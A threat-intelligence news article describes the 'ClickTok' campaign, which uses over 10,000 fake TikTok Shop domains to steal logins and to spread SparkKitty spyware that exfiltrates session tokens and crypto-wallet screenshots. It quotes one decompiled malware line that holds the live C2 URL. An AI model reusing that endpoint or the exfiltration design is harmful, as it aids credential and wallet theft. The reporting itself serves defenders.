10,000+ Malicious TikTok Shop Domains Attacking Users to Steal Logins and Deploy Malware

A sophisticated cybercriminal campaign dubbed “ClickTok” has emerged as one of the most extensive threats targeting TikTok Shop users worldwide, with researchers identifying over 10,000 malicious domains designed to steal user credentials and deploy advanced spyware.

The campaign represents a significant escalation in e-commerce-focused cyberattacks, combining traditional phishing techniques with cutting-edge malware distribution to exploit the growing popularity of TikTok’s in-app shopping platform.

The threat actors behind ClickTok have developed a dual-pronged attack strategy that targets both regular shoppers and participants in TikTok’s affiliate program.

The campaign leverages deceptive replicas of legitimate TikTok Shop interfaces, tricking users into believing they are interacting with official platform features.

These fraudulent sites extend beyond simple TikTok Shop impersonation to include fake versions of TikTok Wholesale and TikTok Mall, creating a comprehensive ecosystem of malicious storefronts designed to maximize victim engagement.

CTM360 analysts identified the campaign in August 2025, revealing the sophisticated nature of the operation that exploits both the trust users place in TikTok’s brand and the financial incentives associated with affiliate marketing programs.

The researchers discovered that threat actors are distributing their malicious payload through over 5,000 distinct app download sites, using embedded download links and QR codes to facilitate widespread distribution of trojanized applications.

The attack methodology involves creating lookalike domains using low-cost top-level domains such as .top, .shop, and .icu, which serve dual purposes: hosting phishing pages for credential theft and distributing malicious applications.

These domains are often hosted on shared or free hosting services, making them both cost-effective for attackers and challenging for defenders to track comprehensively.

The campaign’s global reach extends far beyond the 17 countries where TikTok Shop is officially available, targeting users worldwide through AI-generated content and fake social media advertisements.

Technical Infrastructure and Command & Control Operations

The malicious applications distributed through this campaign deploy a variant of the SparkKitty spyware, which establishes persistent communication with attacker-controlled infrastructure.

Decompilation of the malware reveals hardcoded command and control servers, with the primary endpoint being statically embedded in the application’s source code:-

URL url = new URL("https://aa.6786587.top/?dev=az");

This hardcoded approach suggests either an immature threat actor or early-stage development, as more sophisticated malware typically employs dynamic C2 rotation techniques.

The malware initiates communication by sending POST and GET requests containing harvested data including TikTok user IDs and session tokens (PHPSESSID).

The C2 server responds with Base64-encoded payloads containing dynamic configurations, campaign identifiers, and command instructions tailored to specific infections.

The spyware’s primary capabilities focus on data exfiltration, particularly targeting cryptocurrency-related information stored on infected devices.

The malware systematically scrapes device galleries for screenshots that may contain seed phrases or wallet information, while simultaneously conducting comprehensive device fingerprinting to collect operating system details, device identifiers, and location data for transmission back to the attackers’ servers.

Equip your SOC with full access to the latest threat data from ANY.RUN TI Lookup that can Improve incident response -> Get 14-day Free Trial